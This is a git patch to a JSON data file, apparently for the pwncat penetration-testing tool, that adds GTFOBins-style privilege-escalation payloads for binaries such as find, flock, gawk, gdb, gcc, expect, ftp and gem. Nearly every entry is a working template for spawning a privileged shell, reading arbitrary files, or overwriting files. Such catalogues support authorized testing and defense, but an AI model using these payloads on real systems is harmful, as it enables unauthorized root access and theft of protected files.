From c930925d273045a0dabd47ed68169b99c587853e Mon Sep 17 00:00:00 2001 From: John Hammond Date: Sun, 17 May 2020 19:35:49 -0400 Subject: [PATCH] Added more GTFObins --- data/gtfobins.json | 212 +++++++++++++++++++++++++++++++++++++++------ 1 file changed, 185 insertions(+), 27 deletions(-) diff --git a/data/gtfobins.json b/data/gtfobins.json index 1f00130..49cb353 100644 --- a/data/gtfobins.json +++ b/data/gtfobins.json @@ -209,33 +209,6 @@ "exit": "{ctrl_d}" } ], -//------------------------------------------------------------------- - "gawk": [ - { - "type": "shell", - "payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'", - "exit": "exit" - }, - { - "type": "read", - "stream": "print", - "payload": "{command} // {lfile}" - }, - { - "type": "read", - "stream": "raw", - "payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'" - }, - { - "type": "write", - "stream": "print", - "args": [ - "-v", "LFILE={lfile}", - "'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'" - ], - "exit": "{ctrl_d}" - } - ], //------------------------------------------------------------------- "base32": [ { @@ -641,7 +614,192 @@ "args": ["$TF"] } ], +//------------------------------------------------------------------- + "expand": [ + { + "type": "read", + "stream": "print", + "payload": "{command}", + "args": ["{lfile}"] + } + ], +//------------------------------------------------------------------- + "expect": [ + { + "type": "shell", + "payload": "{command}", + "args": ["-c", "\"spawn {shell} -p; interact\""], + "exit": "exit\n" + }, + { + "type": "read", + "stream": "raw", + "payload": "{command}", + "args": ["-c", "\"spawn {cat} {lfile}; interact\""] + } + // Theoretically we should be able to get File Write for this. + // Sine it has it own little subprocess, I can't seem to get stdin to funnel in. + ], +//------------------------------------------------------------------- + "facter": [ + { + "type": "shell", + "payload": "TF=$({mktemp} -d); echo 'exec(\"{shell} -p\")' > $TF/x.rb; FACTERLIB=$TF {command}", + "args": [""] + } + // This does not behave with sudo very often. + // Because it sets an environment variable, -E must be used + // when calling sudo (which pwncat currently does not have support for) + // and the user needs to be able to preserve the environment... + ], +//------------------------------------------------------------------- + "find": [ + { + "type": "shell", + "payload": "{command}", + "args": [".", "-exec", "{shell} -p", "\\;", "-quit"] + }, + { + "type": "read", + "stream": "raw", + "payload": "{command}", + "args": [".", "-exec", "{cat} {lfile}", "\\;", "-quit"] + } + ], +//------------------------------------------------------------------- + "flock": [ + { + "type": "shell", + "payload": "{command}", + "args": ["-u", "/", "{shell} -p"] + }, + { + "type": "read", + "stream": "raw", + "payload": "{command}", + "args": ["-u", "/", "{cat} {lfile}"] + }, + { + "type": "write", + "stream": "base64", + "payload": "{command}", + "args": ["-u", "/", "{sh} -c \"{base64} -d > {lfile}\""], + "exit": "{ctrl_d}{ctrl_d}" + } + ], +//------------------------------------------------------------------- + "fmt": [ + { + "type": "read", + "stream": "raw", + "payload": "{command}", + "args": ["-pNON_EXISTING_PREFIX", "{lfile}"] + } + ], +//------------------------------------------------------------------- + "fold": [ + { + "type": "read", + "stream": "raw", + "payload": "{command}", + "args": ["-w99999999", "{lfile}"] + } + ], +//------------------------------------------------------------------- + "ftp": [ + { + "type": "shell", + "payload": "{command}", + "input": "!{shell} -p\n", + // Exit the shell, then exit the FTP client + "exit": "exit\nexit\n" + } + ], +//------------------------------------------------------------------- + "gawk": [ + { + "type": "shell", + "payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'", + "exit": "exit" + }, + { + "type": "read", + "stream": "print", + "payload": "{command} // {lfile}" + }, + { + "type": "read", + "stream": "raw", + "payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'" + }, + { + "type": "write", + "stream": "print", + "args": [ + "-v", "LFILE={lfile}", + "'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'" + ], + "exit": "{ctrl_d}" + } + ], +//------------------------------------------------------------------- + "gcc": [ + { + "type": "shell", + "payload": "{command}", + "args": ["-wrapper", "{shell},-p,-s", "."] + } + ], +//------------------------------------------------------------------- + "gdb": [ + { + "type": "shell", + "payload": "{command}", + "args": ["-q", "-nx", "-ex", "'!{shell} -p'", "-ex", "quit"] + }, + { + "type": "shell", + "payload": "{command}", + "args": ["-q", "-nx", "-ex", "'python import os; os.execl(\"{shell}\", \"{shell}\", \"-p\")'", "-ex", "quit"] + }, + { + "type": "read", + "stream":"print", + "payload": "{command}", + "args": ["-q", "-nx", "-ex", "'set height 0'", "-ex", "'python print(open(\"{lfile}\").read())'", "-ex", "quit"] + }, + { + "type": "write", + "stream":"print", + "payload": "{command}", + "args": ["-q", "-nx", "-ex", "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'", "-ex", "quit"], + "exit": "{ctrl_d}{ctrl_d}" + } + // We SHOULD be able to read base64 data... but for the life of me, I cannot get the whole file to come through. Leaving this alone. + // { + // "type": "write", + // "stream":"base64", + // "payload": "{command}", + // "args": ["-q", "-nx", "-ex", "'python import sys,base64; exec(\"\"\"with open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")'", "-ex", "quit"], + // "exit" : "{ctrl_d}" + // } + // , + ], +//------------------------------------------------------------------- + "gem": [ + { + "type": "shell", + "payload": "{command}", + "args": ["open", "-e", "'{shell} -c {shell} -p'", "rdoc"] + }, + { + "type": "read", + "stream" : "raw", + "payload": "{command}", + "args": ["open", "-e", "'{cat} {lfile}'", "rdoc"] + } + ],